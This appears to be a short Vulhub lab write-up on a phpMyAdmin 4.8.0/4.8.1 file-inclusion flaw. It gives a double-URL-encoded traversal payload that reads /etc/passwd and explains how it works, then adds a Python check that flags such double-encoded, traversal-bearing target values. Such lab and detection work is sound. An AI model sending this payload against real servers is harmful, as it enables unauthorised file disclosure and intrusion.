Affected versions
phpMyAdmin 4.8.0 and 4.8.1
Environment
Vulhub - Docker-Compose file for vulnerability environment
Exploitation
?target=db_sql.php%253f/../../../../../../../../etc/passwd
Because `%253f` becomes `?` after being URL-decoded twice, the whole request becomes
?target=db_sql.php?/../../../../../../../../etc/passwd
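As an added example (not code from phpMyAdmin or Vulhub), the following Python check replays the two decoding passes described above on constructed request URIs and flags `target` values that only reveal a `?` or `..` path segments after the second pass. The function names and the sample requests are assumptions made for illustration.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed request URIs for illustration (not taken from a real log).
SAMPLE_REQUESTS = [
    "/index.php?target=db_sql.php",
    "/index.php?target=server_status.php%3Fdb%3Dtest",
    "/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd",
]


def target_stages(request_uri):
    """Return (once_decoded, twice_decoded) for `target`, or None if absent."""
    values = parse_qs(urlsplit(request_uri).query).get("target")
    if not values:
        return None
    once = values[0]       # value after the normal, single URL decode
    twice = unquote(once)  # value after a second decoding pass
    return once, twice


def findings(request_uri):
    """List the reasons a `target` value deserves a closer look."""
    stages = target_stages(request_uri)
    if stages is None:
        return []
    once, twice = stages
    found = []
    if once != twice:
        # The value still contained percent-escapes after one decode.
        found.append("double-encoded")
    if "?" in twice and "?" not in once:
        # A query separator appears only after the second decode.
        found.append("hidden-query-separator")
    if ".." in twice.replace("\\", "/").split("/"):
        found.append("path-traversal")
    return found


if __name__ == "__main__":
    for uri in SAMPLE_REQUESTS:
        print(findings(uri) or ["clean"], uri)
```
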